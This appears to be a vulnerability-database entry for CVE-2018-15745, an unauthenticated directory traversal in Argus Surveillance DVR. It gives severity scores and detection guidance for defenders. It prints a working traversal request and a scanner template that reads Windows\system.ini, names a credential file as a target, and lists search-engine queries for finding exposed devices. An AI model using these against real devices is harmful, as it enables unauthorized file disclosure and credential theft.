cbcvebase.
CVE-2018-15745
published 2018-08-30

CVE-2018-15745: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE…

PriorityP273high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
ITWEXPLOIT
Exploited in the wild
EPSS
97.71%
99.9th percentile
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
argussurveillancedvr

Detection & IOCsextracted from sources · hover to see the quote

url/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
port8080
pathC:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
filenameWEBACCOUNT.CGI
command..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini
sigma
id: CVE-2018-15745
info:
  name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
http:
- method: GET
  path:
  - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
matchers-condition: and
matchers:
- type: word
  part: body
  words:
  - "for 16-bit app support"
  - "[drivers]"
  condition: and
- type: status
  status:
  - 200
  • Detect exploitation attempts by matching HTTP GET requests to /WEBACCOUNT.CGI containing the traversal sequence ..%2F in the RESULTPAGE parameter, particularly on port 8080.
  • Alert on HTTP 200 responses to /WEBACCOUNT.CGI traversal requests whose body contains both 'for 16-bit app support' and '[drivers]', confirming successful file read of Windows\system.ini.
  • Monitor for access to DVRParams.ini via directory traversal, as this file is a high-value target on Argus DVR systems and may expose additional credentials or vulnerabilities.
  • Use Shodan/FOFA queries to identify exposed Argus DVR instances: shodan-query 'http.title:"web viewer for samsung dvr"' and fofa-query 'title="web viewer for samsung dvr"'.
  • ·The vulnerability affects only Argus Surveillance DVR version 4.0.0.0 and the product has never received a patch, meaning all deployed instances remain vulnerable.
  • ·The traversal is unauthenticated — no credentials are required (WEBACCOUNTID and WEBACCOUNTPASSWORD are empty), so network-level access to port 8080 is sufficient for exploitation.
  • ·This is a Windows-based application; traversal payloads should target Windows file paths (e.g., Windows\system.ini, C:\ProgramData\...) rather than Unix-style paths.

CVSS provenance

nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.